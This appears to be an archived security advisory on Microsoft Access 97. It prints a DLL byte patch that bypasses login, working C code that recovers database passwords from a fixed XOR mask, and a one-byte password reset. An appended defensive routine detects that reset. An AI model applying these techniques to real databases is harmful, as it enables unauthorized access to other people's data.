COMMAND
MS Access 97
SYSTEMS AFFECTED
Win running MS Access 97
PROBLEM
Alexey Doumov posted the following. There is a potential problem with
MS Access 97's MSJET35.DLL which may lead to unauthorized access by a
simple modification of its code. The original code of MSJET35.DLL is:
B0747: B9 10 00 00 00 mov cx, 10
B074C: F3 A6 repe cmpsb
B074E: 75 02 jne B0752
New code of MSJET35.DLL is:
B0747: B9 10 00 00 00 mov cx, 10
B074C: F3 A6 repe cmpsb
B074E: 90 nop
B074F: 90 nop
Make this change and run
msaccess.exe /user admin
and have fun.
Here is yet another vulnerability. MS Access allows us to set a
password for a database. Yes, it does. But we can find that this
password is stored in 13 bytes at offset 0x42 in an .MDB file.
To get it decrypted we need only read these 13 bytes and apply the
bitwise exclusive OR operator with the bytes 0x86, 0xFB, 0xEC,
0x37, 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13
respectively. This sequence represents the all-zeros password and
can be found in a non-encrypted .MDB file at offset 0x42.
This is a fragment of code to get the database password:
#include <stdio.h>
static unsigned char mask[13] = {0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13};
int main(int argc, char **argv)
{
    unsigned char password[14];
    /* get 13 bytes from the .MDB file named on the command line (offset 0x42) into password */
    FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
    if (!f || fseek(f, 0x42, SEEK_SET) != 0 || fread(password, 1, 13, f) != 13) return 1;
    fclose(f);
    for (int i = 0; i < 13; i++) password[i] ^= mask[i];   /* undo the fixed XOR mask */
    password[13] = 0;                                      /* NUL-terminate for printf */
    printf("password=%s\n", password);
    return 0;
}
Note 1. If someone wants to reset the password, he can just set the
value of the byte at offset 0x42 to 0x86.
Note 2. The last character is ignored in a 14-character password.
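The following C routine is an added example and is not part of the posting above. It uses only the facts the posting gives (the 13-byte field at offset 0x42 and the fixed mask) to audit an .MDB header from the defender's side: because the mask is constant, the field can be classified as "no password", "password set" or "blanked in place" without reconstructing the password, and the single-byte reset from Note 1 leaves a recognisable residue (first decoded byte NUL, later decoded bytes non-NUL) that the audit reports. The function and enum names are hypothetical, and the 128-byte sample headers are constructed in the code rather than read from real files.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Values from the posting for Access 97 (Jet 3) .MDB files: the 13 bytes at
 * offset 0x42 are the password XORed with this fixed mask, so an unprotected
 * file stores exactly the mask there. */
#define MDB_PW_OFFSET 0x42
#define MDB_PW_LEN    13
static const unsigned char MDB_MASK[MDB_PW_LEN] =
    {0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13};

/* Audit result for the password field (hypothetical names). */
enum mdb_pw_state {
    MDB_HDR_TOO_SHORT = -1,  /* buffer does not reach offset 0x42 + 13 */
    MDB_PW_EMPTY      = 0,   /* field equals the mask: no password set */
    MDB_PW_SET        = 1,   /* a password is in force */
    MDB_PW_BLANKED    = 2    /* first byte is 0x86 but residue of an old password
                                remains: the signature of the Note 1 in-place reset */
};

/* Classify the field without reconstructing the password itself. */
int mdb_password_state(const unsigned char *hdr, size_t len)
{
    if (len < MDB_PW_OFFSET + MDB_PW_LEN)
        return MDB_HDR_TOO_SHORT;
    const unsigned char *field = hdr + MDB_PW_OFFSET;
    int residue = 0;                          /* any non-NUL decoded byte after the first? */
    for (int i = 1; i < MDB_PW_LEN; i++)
        if ((field[i] ^ MDB_MASK[i]) != 0) { residue = 1; break; }
    if ((field[0] ^ MDB_MASK[0]) != 0)        /* first decoded byte non-NUL: password in force */
        return MDB_PW_SET;
    return residue ? MDB_PW_BLANKED : MDB_PW_EMPTY;
}

/* Build a constructed header (sample data, not a real .MDB) whose password field
 * encodes `password` the way the posting describes. Returns the header size, or 0
 * if the buffer is too small. Passwords longer than 13 bytes are truncated. */
size_t mdb_make_sample_header(unsigned char *out, size_t cap, const char *password)
{
    if (cap < MDB_PW_OFFSET + MDB_PW_LEN) return 0;
    memset(out, 0, cap);
    size_t n = strlen(password);
    for (int i = 0; i < MDB_PW_LEN; i++) {
        unsigned char plain = (size_t)i < n ? (unsigned char)password[i] : 0;
        out[MDB_PW_OFFSET + i] = plain ^ MDB_MASK[i];
    }
    return cap;
}

/* Demo/test helper: encode `password` into a sample header, optionally apply the
 * Note 1 single-byte reset, and return the audit state. */
int mdb_sample_state(const char *password, int apply_note1_reset)
{
    unsigned char hdr[128];
    if (mdb_make_sample_header(hdr, sizeof hdr, password) == 0) return MDB_HDR_TOO_SHORT;
    if (apply_note1_reset) hdr[MDB_PW_OFFSET] = 0x86;
    return mdb_password_state(hdr, sizeof hdr);
}

int main(void)
{
    static const char *names[] = {"header too short", "no password", "password set", "blanked in place"};
    printf("empty password        : %s\n", names[mdb_sample_state("", 0) + 1]);
    printf("password 'letmein'    : %s\n", names[mdb_sample_state("letmein", 0) + 1]);
    printf("'letmein' after reset : %s\n", names[mdb_sample_state("letmein", 1) + 1]);
    return 0;
}
```

Run against a real header, `mdb_password_state` takes the first 0x4F bytes of the file; a result of MDB_PW_BLANKED on a database that should still be protected is worth following up, since the only way the field reaches that shape is a write to the single byte at 0x42. Like the MSJET35.DLL patch above, that write is a modification of a file on disk, so comparing the database and DLL against known-good copies catches both.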
SOLUTION
No info. I'm not sure whether SR-1 makes any difference, but
password protection of MS Office components was never very strong.
If you really want to protect your database, you should look for
a professional piece of software.